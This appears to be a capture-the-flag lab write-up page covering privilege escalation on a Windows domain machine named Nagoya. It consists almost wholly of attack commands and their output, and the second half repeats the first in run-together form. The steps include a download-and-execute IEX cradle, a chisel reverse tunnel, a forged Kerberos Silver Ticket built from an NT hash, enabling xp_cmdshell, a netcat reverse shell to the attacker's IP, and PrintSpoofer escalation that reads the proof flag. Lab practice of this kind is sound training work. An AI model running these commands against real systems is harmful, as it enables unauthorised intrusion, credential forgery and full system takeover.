Priv Esc

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> IEX(New-Object Net.WebClient).downloadString('http://192.168.45.239/PrivescCheck.ps1');Invoke-PrivescCheck

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr /I 1433
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2184
  TCP    [::]:1433              [::]:0                 LISTENING       2184

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> iwr 192.168.45.239/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> .\chisel.exe client 192.168.45.239:1335 R:1433:127.0.0.1:1433
chisel.exe : 2024/10/15 19:14:26 client: Connecting to ws://192.168.45.239:1335
    + CategoryInfo          : NotSpecified: (2024/10/15 19:1...168.45.239:1335:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/10/15 19:14:27 client: Connected (Latency 39.4055ms)

❯ netexec mssql 127.0.0.1 -u svc_mssql  -p Service1 --port 1433
MSSQL       127.0.0.1       1433   NAGOYA           [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
MSSQL       127.0.0.1       1433   NAGOYA           [+] nagoya-industries.com\svc_mssql:Service1

Grant a Silver Ticket using MSSQL

❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administratorii

❯ export KRB5CCNAME=$PWD/Administrator.ccache

SQL (NAGOYA-IND\Administrator  dbo@master)> sp_configure 'show advanced options', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell whoami
output
--------------------
nagoya-ind\svc_mssql

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> iwr 192.168.45.239/nc.exe -o nc.exe

SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell "C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe"

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\programdata> iwr 192.168.45.239/PrintSpoofer64.exe -o printspoofer.exe

PS C:\programdata> .\printspoofer.exe -i -c powershell.exe
.\printspoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
nagoya-ind\nagoya$
707ad72dba55f91d0bba2cf131119dd7

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.246.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.246.254
PS C:\Windows\system32>

PreviousFoothold NextCredentials / Notes / LL

Last updated 4 months ago

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr /I 1433 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2184 TCP [::]:1433 [::]:0 LISTENING 2184

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> iwr 192.168.45.239/chisel.exe -o chisel.exe *Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> .\chisel.exe client 192.168.45.239:1335 R:1433:127.0.0.1:1433 chisel.exe : 2024/10/15 19:14:26 client: Connecting to ws://192.168.45.239:1335 + CategoryInfo : NotSpecified: (2024/10/15 19:1...168.45.239:1335:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError 2024/10/15 19:14:27 client: Connected (Latency 39.4055ms)

❯ netexec mssql 127.0.0.1 -u svc_mssql -p Service1 --port 1433 MSSQL 127.0.0.1 1433 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com) MSSQL 127.0.0.1 1433 NAGOYA [+] nagoya-industries.com\svc_mssql:Service1

❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administratorii

SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'show advanced options', '1'; INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE; SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1'; INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE; SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell whoami output -------------------- nagoya-ind\svc_mssql

PS C:\Windows\system32> whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeMachineAccountPrivilege Add workstations to domain Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

PS C:\programdata> .\printspoofer.exe -i -c powershell.exe .\printspoofer.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig nagoya-ind\nagoya$ 707ad72dba55f91d0bba2cf131119dd7 Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 192.168.246.21 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.246.254 PS C:\Windows\system32>